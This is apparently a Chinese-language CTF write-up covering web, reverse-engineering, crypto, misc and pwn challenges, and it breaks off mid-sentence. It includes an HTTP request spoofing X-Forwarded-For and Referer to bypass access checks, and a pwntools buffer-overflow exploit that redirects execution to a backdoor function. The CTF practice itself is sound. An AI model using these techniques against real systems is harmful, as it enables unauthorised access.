年末年初忙得想鼠，淺打兩下……

Web - Classic Childhood Game

控制臺直接執行函數即可

Web - Become A Member

GET / HTTP/1.1
Host: week-1.hgame.lwsec.cn:30637
User-Agent: Cute-Bunny
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: code=Vidar
Upgrade-Insecure-Requests: 1
Referer:bunnybunnybunny.com
X-Forwarded-For:127.0.0.1
Content-Length: 47

{"username":"luckytoday","password":"happy123"}

Web - Guess Who I Am

我寫爬蟲是一款菜狗（錯亂）

import requests

al=[{"id":"ba1van4","intro":"21級 / 不會Re / 不會美工 / 活在夢里 / 喜歡做不會的事情 / ??粉"},...]

import ast

headers={"Host": "week-1.hgame.lwsec.cn:30812",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
"Accept": "application/json, text/plain, */*",
"Connection": "keep-alive",
"Referer": "http://week-1.hgame.lwsec.cn:30812/"}

url="http://week-1.hgame.lwsec.cn:30812"
cookies={"session":"MTY3MzQ4OTAzN3xEdi1CQkFFQ180SUFBUkFCRUFBQU9fLUNBQUlHYzNSeWFXNW5EQTBBQzJOb1lXeHNaVzVuWlVsa0EybHVkQVFDQUVvR2MzUnlhVzVuREFnQUJuTnZiSFpsWkFOcGJuUUVBZ0FFfDz5IcB7f5lvpRwijKnYXmSq29oYpfT9mHQc_w-7c5ce"}
for i in range(100):
    a=requests.get(url+"/api/getQuestion",headers=headers,cookies=cookies)
    b=requests.get(url+"/api/getScore",headers=headers,cookies=cookies)
    if "hgame" in b.text:
        print(b.text)
        break
    tmp=ast.literal_eval(a.text)
    for j in al:
        if j["intro"]==tmp["message"]:
            data={"id":j["id"]}
            break
    c=requests.post(url+"/api/verifyAnswer",headers=headers,cookies=cookies,data=data)
    if "Please get a question first!" in c.text or "rong" in c.text:
        break
    cookies=c.cookies

RE - test your IDA

常規操作F5

RE - easyasm

異或即可
發現一年多過去自己已經把剛補學的匯編忘得七七八八，好崩潰，這就是老年人嗎（……）

RE - easyenc

復制粘貼就完事了

v8='04,-1,-3,9,1,-13,-80,00,00,05,-16,-83,07,06,23,5,-21,23,-3,23,-22,01,-18,1,-22,-79,05,-6,08,01,23,-84,-20,01,-22,-3,-16,05,07,6'
v8=v8.split(',')
f=''
for i in range(len(v8)):
    f+=chr((int(v8[i])+86)^0x32)

RE - encode

復制粘貼就完事了*2

v5='8,6,7,6,1,6,D,6,5,6,B,7,5,6,E,6,3,6,F,6,4,6,5,6,F,5,9,6,3,7,F,5,5,6,1,6,3,7,9,7,F,5,6,6,F,6,2,7,F,5,1,6,F,5,2,7,5,6,6,7,5,6,2,7,3,7,5,6,F,5,5,6,E,6,7,6,9,6,E,6,5,6,5,6,2,7,D,7'
v5=v5.split(',')
f=''
for i in range(0,176,2):
    a=v5[i+1]+v5[i]
    f+=chr(int(a,16))

Crypto-兔兔的車票

問就是懶人暴力破解甚至懶得整理代碼

from PIL import Image
# from Crypto.Util.number import *
from random import shuffle, randint, getrandbits

# flagImg = Image.open('flag.png')
# width = flagImg.width
# height = flagImg.height

# def makeSourceImg():
#     colors = long_to_bytes(getrandbits(width * height * 24))[::-1]
#     img = Image.new('RGB', (width, height))
#     x = 0
#     for i in range(height):
#         for j in range(width):
#             img.putpixel((j, i), (colors[x], colors[x + 1], colors[x + 2]))
#             x += 3
#     return img

flagImg = Image.open('enc0.png')
width = flagImg.width
height = flagImg.height


def xorImg(keyImg, sourceImg):
    img = Image.new('RGB', (width, height))
    for i in range(height):
        for j in range(width):
            p1, p2 = keyImg.getpixel((j, i)), sourceImg.getpixel((j, i))
            img.putpixel((j, i), tuple([(p1[k] ^ p2[k]) for k in range(3)]))
    return img
"""
source文件夾下面的圖片生成過程：
def makeImg():
    colors = list(long_to_bytes(getrandbits(width * height * 23)).zfill(width * height * 24))
    shuffle(colors)
    colors = bytes(colors)
    img = Image.new('RGB', (width, height))
    x = 0
    for i in range(height):
        for j in range(width):
            img.putpixel((j, i), (colors[x], colors[x + 1], colors[x + 2]))
            x += 3
    return img

for i in range(15):
    im = makeImg()
    im.save(f"./source/picture{i}.png")
"""
# n1 = makeSourceImg()
# n2 = makeSourceImg()
# n3 = makeSourceImg()
# nonce = [n1, n2, n3]

index = list(range(16))
shuffle(index)
e=0


"""
這里flag.png已經提前被保存在source文件夾下了，文件名也是picture{xx}.png
"""

# for i in index:
#     im = Image.open(f"source/picture{i}.png")
#     key = nonce[randint(0, 2)]
#     encImg = xorImg(key, im)
#     encImg.save(f'pics/enc{e}.png')
#     e+=1

for i in index:
    im = Image.open(f'pics/enc{e}.png')
    for j in range(16):
        key = Image.open(f'pics/enc{j}.png')
        encImg = xorImg(key, im)
        encImg.save(f"source/picture{i}_{j}.png")
    e+=1

Crypto-RSA

問就是factordb然后常規操作

'''
from Crypto.Util.number import *

flag = open('flag.txt', 'rb').read()

p = getPrime(512)
q = getPrime(512)
n=p*q
e = 65537
m = bytes_to_long(flag)
c = pow(m, e, n)
print(f"c={c}")
print(f"n={n}")

"""
c=110674792674017748243232351185896019660434718342001686906527789876264976328686134101972125493938434992787002915562500475480693297360867681000092725583284616353543422388489208114545007138606543678040798651836027433383282177081034151589935024292017207209056829250152219183518400364871109559825679273502274955582
n=135127138348299757374196447062640858416920350098320099993115949719051354213545596643216739555453946196078110834726375475981791223069451364024181952818056802089567064926510294124594174478123216516600368334763849206942942824711531334239106807454086389211139153023662266125937481669520771879355089997671125020789
"""
'''
import gmpy2
import libnum
e=65537
c=110674792674017748243232351185896019660434718342001686906527789876264976328686134101972125493938434992787002915562500475480693297360867681000092725583284616353543422388489208114545007138606543678040798651836027433383282177081034151589935024292017207209056829250152219183518400364871109559825679273502274955582
n=135127138348299757374196447062640858416920350098320099993115949719051354213545596643216739555453946196078110834726375475981791223069451364024181952818056802089567064926510294124594174478123216516600368334763849206942942824711531334239106807454086389211139153023662266125937481669520771879355089997671125020789

p=11239134987804993586763559028187245057652550219515201768644770733869088185320740938450178816138394844329723311433549899499795775655921261664087997097294813
q=12022912661420941592569751731802639375088427463430162252113082619617837010913002515450223656942836378041122163833359097910935638423464006252814266959128953

phi=(p-1)*(q-1)
d=gmpy2.invert(e, phi)

m = pow(c,d,n)
print(libnum.n2s(int(m)))

Crypto-Be Stream

問就是懶到不想改寫stream函數

# from flag import flag
# assert type(flag) == bytes

flag=b'\x1a\x15\x05\t\x17\t\xf5\xa2-\x06\xec\xed\x01-\xc7\xcc2\x1eXA\x1c\x157[\x06\x13/!-\x0b\xd4\x91-\x06\x8b\xd4-\x1e+*\x15-pm\x1f\x17\x1bY'

key = [int.from_bytes(b"Be water", 'big'), int.from_bytes(b"my friend", 'big')]

# def stream(i):
#     if i==0:
#         return key[0]%256
#     elif i==1:
#         return key[1]%256
#     else:
#         return (stream(i-2)*7%256 + stream(i-1)*4%256)%256

strea=[key[0]%256,key[1]%256]
# note: len(flag)==48, 48//2==24, 24**6<191102978
for i in range(2,191102978):
    strea.append((strea[i-2]*7%256+strea[i-1]*4%256)%256)

enc = b""
for i in range(len(flag)):
    # water = stream((i//2)**6) % 256
    water=strea[(i//2)**6]
    enc += bytes([water ^ flag[i]])
    print(enc)

# print(enc)
# b'\x1a\x15\x05\t\x17\t\xf5\xa2-\x06\xec\xed\x01-\xc7\xcc2\x1eXA\x1c\x157[\x06\x13/!-\x0b\xd4\x91-\x06\x8b\xd4-\x1e+*\x15-pm\x1f\x17\x1bY'

Crypto-神秘的電話

前幾道題偷的懶終究是反噬了.jpg
打開audacity對著手動錄了半天，我的老胳膊老腰老眼睛……

----- ..--- ..--- ...-- . ..--.- .--. .-. .. .. -... .-.. -.-- ..--.- ..--.- .... --- -. .-- .- ..--.- .--- -- --. .... ..--.- ..-. --. -.- -.-. --.- .- --- --.- - -- ..-. .-.

另一部分base64解密得到提示“只有倒著翻過十八層的籬笆才能抵達北歐神話的終點”，將摩斯密碼解密結果反轉，柵欄密碼密鑰18，維吉尼亞密鑰vidar，結束

MISC-Where am I

wireshark導出壓縮包，顯然偽加密，0017h位24改20，解壓看圖片詳細信息GPS

MISC-e99p1ant_want_girlfriend

懶得翻腳本，既然crc校驗不正確，高度隨便改一下即可

PWN - easy_overflow - 復現

常規操作連上然后卡在錯誤提示，發覺自己根本不會，笑死

from pwn import *
p = remote("...","...")
elf = ELF("./vuln")
f_addr = elf.symbols["b4ckd0or"]
#p.sendline(b'a'*0x18+p64(0x401176))
p.sendline(b'a'*0x18+p64(f_addr))
p.interactive()

提示standard output: Bad file descriptor的處理方法：